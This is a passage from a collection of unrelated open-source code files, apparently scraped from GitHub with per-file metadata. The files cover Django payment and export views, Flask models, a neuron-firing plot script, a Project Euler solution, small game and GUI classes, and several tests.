'_state' and attrib != 'password' :\n\t\t\t\t\t\trow.append(attrib.title().replace('_',' '))\n\t\t\t\trow.append(\"Leader Name\")\n\t\t\t\trow.append(\"Leader Email\")\n\t\t\t\trow.append(\"Leader Contact Number\")\n\t\t\t\twriter.writerow(row)\n\t\t\ti=i+1\n\t\t\trow = [i]\n\t\t\tfor attrib,value in item.__dict__.items():\n\t\t\t\tif attrib != '_state' and attrib != 'password' :\n\t\t\t\t\tif attrib == 'leader_email':\n\t\t\t\t\t\tif value[-12:] == \"iitbhu.ac.in\" or value[-11:] == \"itbhu.ac.in\":\n\t\t\t\t\t\t\tinternal=\"Yes\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinternal=\"No\"\n\n\t\t\t\t\trow.append(value)\n\t\t\trow.append(leader.name)\n\t\t\trow.append(leader.user.email)\n\t\t\trow.append(leader.mobile_no)\n\t\t\twriter.writerow(row)\n\t\texcept:\n\t\t\tc=0\n\treturn 
response\n","repo_name":"vivekiitbhu/shilp18","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33770797220","text":"import numpy as np\nimport argparse\n\n\ndef extract_vectors(input_file, output_file, dim):\n '''this function takes the name of the input, output files, and the expected length of feature-vector and \\\n creats a file of only vectors for each paragraph'''\n\n vector_list=[]\n with open(input_file, 'r') as f:\n for line in f:\n line_sp=line.rsplit()\n vector=line_sp[-dim:]\n vector = np.array([float(x) for x in vector])\n vector_list.append(vector)\n\n vector_np = np.array(vector_list)\n\n np.savetxt(output_file, vector_np)\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', help=\"the file with paragraph+vector(s)\", default=\"out.txt\")\n parser.add_argument('--output', help=\"the file with only vectors\", default=\"vector_results.txt\")\n parser.add_argument('--dim', help='dimensions of the wordvec', default=100)\n args = parser.parse_args()\n extract_vectors(input_file=args.input, output_file=args.output, dim=int(args.dim))\n","repo_name":"teaxhaferi91/simple-fasttext-example","sub_path":"Create_Results.py","file_name":"Create_Results.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42806935017","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom payapp.models import PayRequest, Transaction\nfrom django.contrib import messages\nfrom register.models import CustomUser\nfrom decimal import Decimal\nimport requests\nfrom currencyapi.serializers import ConvertedCurrencySerializer\nfrom currencyapi.models import ConvertedCurrency\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.http import JsonResponse\nfrom .models import Notification\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@login_required\ndef pending_requests(request):\n user = request.user\n received_requests = PayRequest.objects.filter(recipient=user)\n context = {\n 'received_requests': received_requests,\n }\n return render(request, 'account/pendingrequests.html', context)\n\n\n@login_required\ndef transaction_history(request):\n user = request.user\n sender_transactions = Transaction.objects.filter(sender=user)\n recipient_transactions = Transaction.objects.filter(recipient=user)\n transactions = sender_transactions | recipient_transactions\n transactions = transactions.order_by('-timestamp')\n return render(request, 'account/transaction_history.html', {'transactions': transactions})\n\n\n@login_required\n@transaction.atomic\ndef handle_request(request, request_id, action):\n pay_request = get_object_or_404(PayRequest, pk=request_id)\n if pay_request.recipient != request.user:\n return redirect('pendingrequests')\n if action == 'accept':\n recipient = get_object_or_404(CustomUser, username=pay_request.sender)\n amount = pay_request.amount\n sender = request.user\n currency = recipient.currency\n\n if sender.account_balance < amount:\n messages.error(request, 'Insufficient balance')\n return redirect('pendingrequests')\n if sender.currency != recipient.currency:\n url = 
f'{sender.currency}/{recipient.currency}/{amount}'\n            absolute_uri = request.build_absolute_uri('/conversion/' + url)\n            response = requests.get(absolute_uri)\n            if response.status_code == 200:\n                serializer = ConvertedCurrencySerializer(data=response.json())\n                if serializer.is_valid():\n                    conversion_response = ConvertedCurrency(serializer.validated_data['rate'],\n                                                            serializer.validated_data['is_success'])\n                    if conversion_response.is_success:\n                        converted_amount = conversion_response.rate * amount\n                        converted_amount = Decimal(converted_amount)\n                    else:\n                        messages.error(request, 'Your currency could not be converted.')\n                        return redirect('pendingrequests')\n                else:\n                    messages.error(request, 'The currency conversion response could not be parsed.')\n                    return redirect('pendingrequests')\n            else:\n                messages.error(request, f\"Conversion API returned status code {response.status_code}\")\n                return redirect('pendingrequests')\n        else:\n            converted_amount = amount\n\n        # Carry out payment\n        sender.account_balance -= amount\n        recipient.account_balance += converted_amount\n        sender.save()\n        recipient.save()\n\n        # Record the payment in the database\n        payment = Transaction(sender=sender, recipient=recipient, amount=converted_amount, timestamp=timezone.now(),\n                              currency=currency)\n        payment.save()\n        pay_request.delete()\n        messages.success(request, \"Transfer complete\")\n    elif action == 'reject':\n        pay_request.delete()\n    return redirect('pendingrequests')\n\n\n@login_required\ndef notifications(request):\n    notifications = Notification.objects.filter(user=request.user, unread=True).order_by('-timestamp')\n    return render(request, 'account/notifications.html', {'notifications': notifications})\n\n\n@login_required\n@csrf_exempt\ndef mark_as_read(request):\n    if request.method == 'POST':\n        Notification.objects.filter(user=request.user, unread=True).update(unread=False)\n        return JsonResponse({'success': True})\n\n\n@receiver(post_save, sender=Transaction)\ndef notify_transaction(sender, instance, **kwargs):\n    if instance.recipient:\n        message = f\"You received a payment of {instance.amount:.2f} {instance.currency.upper()} from {instance.sender.username}.\"\n        Notification.objects.create(user=instance.recipient, message=message)\n\n\n@receiver(post_save, sender=PayRequest)\ndef notify_pay_request(sender, instance, **kwargs):\n    if instance.recipient:\n        message = f\"You received a payment request of {instance.amount:.2f} {instance.currency.upper()} from {instance.sender.username}.\"\n        url = '/account/pendingrequests'\n        Notification.objects.create(user=instance.recipient, message=message, url=url)\n","repo_name":"arjunjoshua/Payment_Application","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74130017834","text":"import pdb\nfrom threading import Lock\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom absl import logging\nfrom absl.testing import absltest\nfrom liaison.env.rins import Env\nfrom liaison.utils import ConfigDict\n\nB = 8\nT = 9\nN_ACTIONS = 2\nlock = Lock()\n\n\nclass RinsEnvTest(absltest.TestCase):\n\n  def _get_env(self):\n    return Env(0,\n               seed=42,\n               graph_seed=42,\n               make_obs_for_mlp=False,\n               make_obs_for_self_attention=False,\n               k=40,\n               steps_per_episode=180,\n               dataset='milp-facilities-10')\n\n  def _print_done(self):\n    with lock:\n      for _ in range(10):\n        print('*', end='')\n      print('\\nTest done')\n      for _ in range(10):\n        print('*', end='')\n      print('\\n')\n\n  def testStep(self):\n    env = self._get_env()\n    ts = env.reset()\n    for i in range(500):\n      obs = ts.observation\n      mask = obs['node_mask']\n      
assert np.sum(mask) > 0\n act = np.random.choice(range(len(mask)), p=mask / np.sum(mask))\n ts = env.step(act)\n print(ts.reward, env._prev_obj, env._curr_obj)\n pdb.set_trace()\n # print(obs['log_values']['best_ep_return'],\n # obs['log_values']['final_ep_return'])\n\n self._print_done()\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"aravic/liaison","sub_path":"liaison/tests/env/rins_test.py","file_name":"rins_test.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70209242152","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Script to visualize neuron firings.\n#\n\nimport sys, os\nimport numpy as np\nimport time\nimport pickle\nimport argparse\nimport py_reader # reader utility for opendihu *.py files\n\nshow_plot = True\n\n# import needed packages from matplotlib\nimport matplotlib as mpl\nif not show_plot:\n mpl.use('Agg')\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import animation\nfrom matplotlib import cm\nfrom matplotlib.patches import Polygon\nimport matplotlib.gridspec as gridspec\n\n# get all input data in current directory\nfilenames = os.listdir(\"out\")\n\nparallel = False\nsuffix = \".py\"\nif parallel:\n suffix = \".0.py\"\n\nparser = argparse.ArgumentParser(description='plot_spindles')\nparser.add_argument('--store_frequency_file', default=\"\")\nparser.add_argument('--load_frequency_file', default=\"\")\nparser.add_argument('--plot_firing_times', default=False, action=\"store_true\")\nparser.add_argument('--plot_frequency_progression', default=False, action=\"store_true\")\nparser.add_argument('--end_time', type=float, default=np.inf)\nparser.add_argument('--start_time', type=float, default=0)\nparser.add_argument('--files_stride', type=int, default=1)\nargs = parser.parse_args()\n\nif args.plot_firing_times:\n print(\"plot firing times\")\n \nif args.plot_frequency_progression:\n print(\"plot frequency progression\")\n\nif args.end_time < np.inf or args.start_time > 0:\n print(\"restrict data to [{},{}]\".format(args.start_time,args.end_time))\n\nprint(\"store_frequency_file: \\\"{}\\\"\\nload_frequency_file: \\\"{}\\\"\".format(args.store_frequency_file, args.load_frequency_file))\n\n# collect the filenames\ncondition = lambda filename: suffix in filename and \"muscle_spindles\" in filename\nmuscle_spindles_files = [\"out/{}\".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]\nmuscle_spindles_files = muscle_spindles_files[::args.files_stride]\n\n\ncondition = lambda filename: suffix in filename and \"motoneurons\" in filename\nmotoneurons_files = [\"out/{}\".format(filename) for filename in sorted(list(np.extract(np.array(list(map(condition, filenames))), filenames)))]\nmotoneurons_files = motoneurons_files[::args.files_stride]\n\nprint(\"Number of input files: muscle spindles: {}, motoneurons: {}\".\\\n format(len(muscle_spindles_files), len(motoneurons_files)))\n\n\n# load data\nmuscle_spindles_data = py_reader.load_data(muscle_spindles_files)\nmotoneurons_data = py_reader.load_data(motoneurons_files)\n\n# create plots\n\nif not args.plot_frequency_progression:\n fig,axes = plt.subplots(2,2,figsize=(12,6),sharex=True, gridspec_kw={'width_ratios': [10, 1]})\nelse:\n fig,axes = plt.subplots(3,2,figsize=(12,8),sharex=True, 
gridspec_kw={'width_ratios': [10, 1], \"height_ratios\": [1,1,0.5]})\n\n# set global parameters for font sizes\nplt.rcParams.update({\n 'lines.linewidth': 2,\n 'lines.markersize': 10,\n 'lines.markeredgewidth': 2,\n 'font.size': 10,\n 'axes.labelsize': 10,\n 'xtick.labelsize': 10,\n 'ytick.labelsize': 10,\n})\n\n# ---------------------\n# plot muscle spindles\ncomponent_name_input = \"(P)modell/L\"\ncomponent_name_output = \"modell/primary_afferent\"\n\nt_values = None\nvalues_output = None\nvalues_input = None\n\n# loop over datasets at different times\nfor i,dataset in enumerate(muscle_spindles_data):\n \n # get the data for the current timestep\n data_input = py_reader.get_values(dataset, \"parameters\", component_name_input)\n data_output = py_reader.get_values(dataset, \"algebraics\", component_name_output)\n \n if data_input is None:\n print(\"No data found for muscle spindles or component '{}' does not exist.\\n\".format(component_name_input))\n if data_output is None:\n print(\"No data found for muscle spindles or component '{}' does not exist.\\n\".format(component_name_output))\n \n # create arrays the first time\n if values_output is None:\n values_input = np.zeros((len(data_input), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons\n values_output = np.zeros((len(data_output), len(muscle_spindles_data))) # each column is the data for one timestep, for multiple neurons\n t_values = np.zeros((len(muscle_spindles_data)))\n \n # store values\n values_input[:,i] = data_input\n values_output[:,i] = data_output\n t_values[i] = dataset['currentTime']\n\n# restrict data to specified end_time\nstart_index = None\nfor i in range(len(t_values)):\n if t_values[i] >= args.start_time and start_index is None:\n start_index = i\n if t_values[i] > args.end_time:\n end_index = i\n t_values = t_values[start_index:end_index]\n values_input = values_input[:,start_index:end_index]\n values_output = values_output[:,start_index:end_index]\n break\nif args.end_time == np.inf:\n t_values = t_values[start_index:]\n values_input = values_input[:,start_index:]\n values_output = values_output[:,start_index:]\n \n# plot lines for all timesteps\n# loop over neurons\nn = values_output.shape[0]\naxes[0,0].plot([0,max(t_values)],[1,1], \":\", color=(0.5,0.5,0.5))\nfor i in range(n):\n color = next(axes[0,0]._get_lines.prop_cycler)['color']\n axes[0,0].plot(t_values, values_input[i,:], ':', color=color)\n if i == 0:\n ax2 = axes[0,0].twinx()\n ax2.plot(t_values, values_output[i,:], '-', color=color)\n\n# set title and axis labels\naxes[0,0].set_title('Muscle spindles (number: {})'.format(n))\naxes[0,0].set_ylabel('Sensed muscle stretch\\n(dotted lines)', fontsize=12)\naxes[0,0].grid(axis=\"x\")\nax2.set_ylabel('Spindle response [mV]\\n(solid lines)', fontsize=12)\n\n# ---------------------\n# plot motoneurons\ncomponent_name_input = \"(P)motor_neuron/drive\"\ncomponent_name_output = \"motor_neuron/V_s\"\n\nt_values = None\nvalues_output = None\nvalues_input = None\n\n# loop over datasets at different times\nfor i,dataset in enumerate(motoneurons_data):\n \n # get the data for the current timestep\n data_input = py_reader.get_values(dataset, \"parameters\", component_name_input)\n data_output = py_reader.get_values(dataset, \"solution\", component_name_output)\n \n if data_input is None:\n print(\"No data found for motoneurons or component '{}' does not exist.\\n\".format(component_name_input))\n if data_output is None:\n print(\"No data found for motoneurons or component 
'{}' does not exist.\\n\".format(component_name_output))\n \n # create arrays the first time\n if values_output is None:\n values_input = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons\n values_output = np.zeros((len(data_output), len(motoneurons_data))) # each column is the data for one timestep, for multiple neurons\n t_values = np.zeros((len(motoneurons_data)))\n \n # store values\n values_input[:,i] = data_input\n values_output[:,i] = data_output\n t_values[i] = dataset['currentTime']\n\n# restrict data to specified end_time\nstart_index = None\nfor i in range(len(t_values)):\n if t_values[i] >= args.start_time and start_index is None:\n start_index = i\n if t_values[i] > args.end_time:\n end_index = i\n print(\"start_index: {}, end_index: {}\".format(start_index, end_index))\n t_values = t_values[start_index:end_index]\n values_input = values_input[:,start_index:end_index]\n values_output = values_output[:,start_index:end_index]\n break\nif args.end_time == np.inf:\n print(\"start_index: {}\".format(start_index))\n t_values = t_values[start_index:]\n values_input = values_input[:,start_index:]\n values_output = values_output[:,start_index:]\n\nif args.plot_firing_times:\n # ------\n # plot only firing times\n \n n_motor_units = values_output.shape[0]\n end_time = np.max(t_values)\n firing_threshold = np.mean(values_output)*3\n print(\"firing threshold: {}\".format(firing_threshold))\n \n firing_times_mu = []\n for mu_no in range(n_motor_units):\n times = []\n current_value_active = False\n for i,value in enumerate(values_output[mu_no,:]):\n if value > firing_threshold and not current_value_active:\n current_value_active = True\n times.append(t_values[i])\n else:\n current_value_active = False\n firing_times_mu.append(times)\n #axes[1].plot(t_values, values_output[i,:], '-', color=\"k\")\n \n print(\"end time: {}\".format(end_time))\n \n # determine frequencies\n frequencies_mus = []\n for times in firing_times_mu:\n \n f = 1000 / (times[1]-times[0])\n frequencies = [f]\n for i in range(1,len(times)-1):\n f = 2000 / (times[i+1]-times[i-1])\n frequencies.append(f)\n frequencies.append(f)\n \n frequencies = np.array(frequencies)\n frequencies_mus.append(frequencies)\n \n min_frequency = np.min([np.min(m) for m in frequencies_mus])\n max_frequency = np.max([np.max(m) for m in frequencies_mus])\n \n norm = matplotlib.colors.Normalize(vmin=min_frequency,vmax=max_frequency)\n fig.colorbar(cm.ScalarMappable(norm=norm, cmap=matplotlib.cm.viridis), ax=axes[1,1], pad=0.1, panchor=(0.0, 0.5))\n \n # plot line for each MU\n for (mu_no,times) in enumerate(firing_times_mu):\n \n axes[1,0].plot([0,end_time],[mu_no+1,mu_no+1],\"k-\")\n\n # plot stimulation times as vertical bar\n bar_height = 0.2\n \n color_values = (frequencies_mus[mu_no] - min_frequency) / (max_frequency-min_frequency)\n colors = matplotlib.cm.viridis(color_values)\n \n for i,t in enumerate(list(times)):\n axes[1,0].plot(t, mu_no+1, marker=\"+\", color=colors[i])\n \n #axes[1].plot(list(times),[mu_no+1 for _ in times],marker=\"+\",color=colors)\n \n # set title and axis labels\n axes[1,0].set_title('Motor neurons (number: {})'.format(n_motor_units))\n #axes[1,0].set_xlabel('time [ms]', fontsize=12)\n axes[1,0].set_ylabel('Motor units [-]', fontsize=12)\n axes[1,0].grid(axis=\"x\")\n \n if args.plot_frequency_progression:\n l = []\n for mu_no in range(len(firing_times_mu)):\n for i in range(len(firing_times_mu[mu_no])):\n l.append((frequencies_mus[mu_no][i], 
firing_times_mu[mu_no][i]))\n freq_times = sorted(l, key=lambda a: a[1])\n \n fs = [x[0] for x in freq_times]\n ts = [x[1] for x in freq_times]\n \n ts = np.array([ts]).reshape(-1, 1)\n fs = np.array([fs]).reshape(-1, 1)\n \n #print(\"fs: {}\".format(fs))\n #print(\"ts: {}\".format(ts))\n \n # GPR, hyperparameters such as kernel width will be optimized\n from sklearn.gaussian_process import GaussianProcessRegressor\n from sklearn.gaussian_process.kernels import DotProduct, WhiteKernel, RBF, ConstantKernel\n \n kernel = ConstantKernel(constant_value=1.0) + RBF(length_scale=800, length_scale_bounds=(800.0, 1000.0))\n gpr = GaussianProcessRegressor(kernel=kernel).fit(ts, fs)\n \n frequency_values = gpr.predict(np.array([t_values]).reshape(-1,1))\n #print(\"frequency_values: {}\".format(frequency_values))\n \n axes[2,0].plot(t_values, frequency_values, '-', label=\"With spindles\")\n \n if args.load_frequency_file != \"\":\n with open(args.load_frequency_file, \"rb\") as f:\n (other_t_values,other_frequency_values) = pickle.load(f)\n \n n_values = min(len(other_frequency_values), len(t_values))\n \n axes[2,0].plot(other_t_values[0:n_values], other_frequency_values[0:n_values], '--', label=\"Without spindles\")\n \n if args.store_frequency_file != \"\":\n with open(args.store_frequency_file, \"wb\") as f:\n print(\"Dump frequency values to file \\\"{}\\\"\".format(args.store_frequency_file))\n pickle.dump((t_values,frequency_values), f)\n \n axes[2,0].set_ylim(10,max_frequency)\n \n # set title and axis labels\n axes[2,0].set_xlabel('Time [ms]', fontsize=12)\n axes[2,0].set_ylabel('Firing frequency [Hz]', fontsize=12)\n axes[2,0].legend()\n axes[2,0].grid(axis=\"x\")\n \n axes[2,1].set_visible(False)\n \nelse:\n\n # ------\n # plot lines for all timesteps\n # loop over neurons\n n = values_output.shape[0]\n for i in range(n):\n color = next(axes[1,0]._get_lines.prop_cycler)['color']\n axes[1,0].plot(t_values, values_output[i,:], '-', color=color)\n if i == 0:\n ax2 = axes[1,0].twinx()\n ax2.plot(t_values, values_input[i,:], ':', color=color)\n \n # set title and axis labels\n axes[1,0].set_title('Motor neurons (number: {})'.format(n))\n axes[1,0].set_xlabel('time [ms]', fontsize=12)\n axes[1,0].set_ylabel('voltage [mV]\\n(solid lines)', fontsize=12)\n ax2.set_ylabel('input current [uA]\\n(dotted lines)', fontsize=12)\n\naxes[0,1].set_visible(False)\naxes[1,1].set_visible(False)\n\n# show plot window\nplt.tight_layout()\nplt.savefig(\"plot.png\")\nplt.savefig(\"plot.pdf\")\nplt.show()\n","repo_name":"maierbn/opendihu","sub_path":"examples/electrophysiology/neuromuscular/spindles_fibers/plot_spindles.py","file_name":"plot_spindles.py","file_ext":"py","file_size_in_byte":12578,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12844819245","text":"import time \nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.getcwd())),'Utils'))\nfrom arithm import new_decmpo\n\n\nproblem_number = 622\ntest_input = 8\ntest_solution = 412\nproblem_input = 60\n\n\ndef s(n):\n #n is even > 4\n exp = 1\n r = 2\n while r != 1:\n r *= 2\n r = r%(n - 1)\n exp += 1\n return exp\n \n\n#Solution\n\n\ndef solution(limit):\n result = []\n \n decompo = new_decmpo(2**limit - 1)\n divisor = [decompo[0][0]**i for i in range(0, decompo[0][1] + 1)]\n \n for i in range(1, len(decompo)):\n new_divisor = []\n for div in divisor:\n new_divisor += [div*decompo[i][0]**j for j in range(0, decompo[i][1] + 1)]\n divisor = new_divisor\n \n 
divisor.remove(1)\n    for d in divisor:\n        if s(d + 1) == limit:\n            result.append(d + 1)\n    \n    return sum(result)\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution(test_input)\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Input: \"+str(test_input)+\"\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n    string += \"TRUE\"\nelse:\n    string += \"FALSE\"\n\n\nbegin_problem = time.time()\nproblem_value = solution(problem_input)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM #\"+str(problem_number)+\"\\n\\n\"\nstring += \"Input: \"+str(problem_input)+\"\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()\n","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/622-Problem/Problem 622.py","file_name":"Problem 622.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"73851916711","text":"\"\"\"\ndatabase.py\n\nContains classes for database table objects\n\"\"\"\n\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport flask.ext.whooshalchemy as whooshalchemy\nfrom plc3bo import app\n\ndb = SQLAlchemy(app)\n\n\nclass BNFCategory(db.Model):\n    __tablename__ = 'bnf_category'\n    __searchable__ = ['name']\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(255))\n    lowercasename = db.Column(db.String(255), primary_key=True)\n\n    parent_id = db.Column(db.Integer, db.ForeignKey('bnf_category.id'))\n    parent = db.relationship('BNFCategory',\n                             remote_side=[id],\n                             backref=db.backref('children',\n                                                lazy='dynamic',\n                                                order_by=name\n                                                )\n                             )\n\n    def __init__(self, name, parent=None):\n        self.name = name\n        self.lowercasename = name.lower()\n\n        if isinstance(parent, BNFCategory):\n            self.parent = parent\n        else:\n            self.parent_id = parent\n\n    def __repr__(self):\n        return \"<BNFCategory %s>\" % self.name\n\n\nclass BNFChemical(db.Model):\n    __tablename__ = 'bnf_chemical'\n    __searchable__ = ['name']\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(255))\n    lowercasename = db.Column(db.String(255), primary_key=True)\n\n    def __init__(self, name):\n        self.name = name\n        self.lowercasename = name.lower()\n\n    def __repr__(self):\n        return \"<BNFChemical %s>\" % self.name\n\n\nclass BNFDrug(db.Model):\n    __tablename__ = 'bnf_drug'\n    __searchable__ = ['name']\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(255))\n    lowercasename = db.Column(db.String(255), primary_key=True)\n\n    form = db.Column(db.String(50))\n    dosage = db.Column(db.String(50))\n    qty_unit = db.Column(db.Enum('unit', 'millilitre', 'gram', 'other'))\n    prep_class = db.Column(db.Integer)\n\n    chemical_id = db.Column(db.Integer, db.ForeignKey('bnf_chemical.id'))\n    chemical = db.relationship('BNFChemical',\n                               backref=db.backref('drugs',\n                                                  lazy='dynamic'\n                                                  )\n                               )\n\n    category_id = db.Column(db.Integer, db.ForeignKey('bnf_category.id'))\n    category = db.relationship('BNFCategory',\n                               backref=db.backref('drugs',\n                                                  lazy='dynamic'\n                                                  )\n                               )\n\n    def 
__init__(self,\n                 name,\n                 chemical,\n                 category,\n                 form=None,\n                 dosage=None,\n                 qty_unit=None,\n                 prep_class=None):\n        self.name = name\n        self.lowercasename = name.lower()\n        self.form = form\n        self.dosage = dosage\n        self.qty_unit = qty_unit\n        self.prep_class = prep_class\n\n        if isinstance(category, BNFCategory):\n            self.category = category\n        else:\n            self.category_id = category\n\n        if isinstance(chemical, BNFChemical):\n            self.chemical = chemical\n        else:\n            self.chemical_id = chemical\n\n\nclass Statistic(db.Model):\n    __tablename__ = 'statistic'\n\n    id = db.Column(db.Integer, primary_key=True)\n    year = db.Column(db.Integer)\n\n    drug_id = db.Column(db.Integer, db.ForeignKey('bnf_drug.id'))\n    drug = db.relationship('BNFDrug',\n                           backref=db.backref('statistics',\n                                              lazy='dynamic'\n                                              )\n                           )\n\n    items = db.Column(db.Integer)\n    quantity = db.Column(db.Integer)\n    owc2 = db.Column(db.Integer)\n    nic = db.Column(db.Integer)\n\n    def __init__(self,\n                 drug,\n                 year,\n                 items=None,\n                 quantity=None,\n                 owc2=None,\n                 nic=None):\n        self.items = items\n        self.quantity = quantity\n        self.owc2 = owc2\n        self.nic = nic\n        self.year = year\n\n        if isinstance(drug, BNFDrug):\n            self.drug = drug\n        else:\n            self.drug_id = drug\n\n    def __repr__(self):\n        return \"<Statistic %s>\" % self.id\n\n    def todict(self):\n        return {\"items\": self.items,\n                \"quantity\": self.quantity,\n                \"owc2\": self.owc2,\n                \"nic\": self.nic,\n                \"year\": str(self.year),\n                \"costp\": float(self.nic) / float(self.items),\n                \"costi\": float(self.nic) / float(self.quantity),\n                \"iperp\": float(self.quantity) / float(self.items)}\n\n\nwhooshalchemy.whoosh_index(app, BNFDrug)\nwhooshalchemy.whoosh_index(app, BNFCategory)\nwhooshalchemy.whoosh_index(app, BNFChemical)\n","repo_name":"toastwaffle/plc3bo","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4410044486","text":"import pygame\nfrom configuracion import *\n\nclass Enemigo(pygame.sprite.Sprite):\n    def __init__(self, path_imagen, ubicacion, tamanio: tuple, velocidad: int) -> None:\n        super().__init__()\n        self.image = pygame.transform.scale(pygame.image.load(path_imagen).convert_alpha(), tamanio)\n        self.rect = self.image.get_rect()\n        self.rect.center = ubicacion\n        self.velocidad = velocidad\n    \n    def update(self):\n        \"\"\"update Keeps the enemies constantly updated\n        \"\"\"\n        self.mover_enemigo()\n    \n    def mover_enemigo(self):\n        \"\"\"mover_enemigo Makes the enemies fall and, when they leave the screen, reappear at the top\n        \"\"\"\n        self.rect.y += self.velocidad\n        if self.rect.y > PANTALLA_BOTTOM:\n            self.rect.y = PANTALLA_TOP\n","repo_name":"GonzaloCossa/Cossa.Gonzalo.P2.LabI.1A","sub_path":"SPLab_1/src/enemigo.py","file_name":"enemigo.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42335848771","text":"import pytest\nimport mock\n\nimport ckan.model as model\nimport ckan.plugins.toolkit as tk\nimport ckan.tests.factories as factories\nimport ckan.tests.helpers as helpers\n\n_get_action = tk.get_action\nNotAuthorized = tk.NotAuthorized\n\n\n@pytest.mark.usefixtures('keep_db_tables_on_clean', 'clean_db', 'with_request_context')\nclass TestApiTokenCreationEmail(object):\n\n    SYSADMIN_EMAIL = 'token_sysadmin@test.org'\n    USER_EMAIL = 'token_testuser@test.org'\n\n    
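# patch the mail helper so the test can assert on recipients without sending real email\n    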
@mock.patch('ckanext.hdx_users.helpers.token_creation_notification_helper._mail_recipient')\n def test_notify_users_about_api_token_creation(self, mail_recipient_mock):\n '''\n :param mail_recipient_mock:\n :type mail_recipient_mock: mock.MagicMock\n :return:\n '''\n sysadmin = factories.Sysadmin(email=self.SYSADMIN_EMAIL)\n context_sysadmin = {\n 'model': model,\n 'user': sysadmin['name']\n }\n\n token_owner = factories.User(name='testuser', email=self.USER_EMAIL, fullname='Test User')\n context_owner = {\n 'model': model,\n 'user': token_owner['name']\n }\n\n helpers.call_action('api_token_create', context=context_sysadmin, user=token_owner['name'], name='token-sys-1',\n expires_in=5, unit=24 * 60 * 60)\n assert mail_recipient_mock.call_count == 1\n assert mail_recipient_mock.call_args[0][1] == self.USER_EMAIL\n\n helpers.call_action('api_token_create', context=context_owner, user=token_owner['name'], name='token-u1-1',\n expires_in=5, unit=24 * 60 * 60)\n assert mail_recipient_mock.call_count == 2\n assert mail_recipient_mock.call_args[0][1] == self.USER_EMAIL\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_users/ckanext/hdx_users/tests/test_emails/test_api_token_creation_email.py","file_name":"test_api_token_creation_email.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"10075617401","text":"\nimport kivy\nfrom kivy.uix.widget import Widget\nfrom kivy.core.text import Label as textLabel\nfrom kivy.uix.label import Label as KiLabel\nfrom kivy.uix.textinput import TextInput\nfrom kivy.lang import Builder\nfrom kivy.uix.scatter import Scatter\nfrom kivy.graphics.opengl import *\nfrom kivy.graphics import *\nfrom kivy.properties import ObjectProperty\nimport sys\nimport math\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.metrics import cm\nfrom WidgetValFunctionHandler import WidgetValFunctionHandler\nfrom kivy_garden.speedmeter import SpeedMeter\nfrom kivy.uix.spinner import Spinner\nfrom WidgetHelper import WidgetHelper\nfrom MyLabel import MyLabel\nfrom kivy.uix.progressbar import ProgressBar\n \n \nclass CircularProgressBar(ProgressBar):\n\n def __init__(self, **kwargs):\n super(CircularProgressBar, self).__init__(**kwargs)\n self.thickness = 40\n self.label = textLabel(text=\"0%\", font_size=self.thickness)\n self.texture_size = None\n 